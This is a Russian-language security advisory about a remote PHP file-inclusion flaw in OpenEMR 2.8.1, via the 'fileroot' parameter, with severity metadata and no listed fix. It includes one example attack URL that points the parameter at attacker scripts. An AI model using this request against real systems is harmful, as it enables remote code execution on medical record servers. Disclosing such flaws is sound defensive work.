PHP-инклюдинг в OpenEMR

Дата публикации:
14.06.2006
Дата изменения:
17.10.2006
Всего просмотров:
1011
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
OpenEMR 2.x
Уязвимые версии: OpenEMR 2.8.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "fileroot" в сценарии "contrib/forms/evaluation/C_FormEvaluation.class.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://www.site.com/[OpenEMR_path]/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=[evil_scripts]

URL производителя: www.oemr.org

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: OpenEMR <= 2.8.1 Remote File Include Vulnerability

или введите имя

CAPTCHA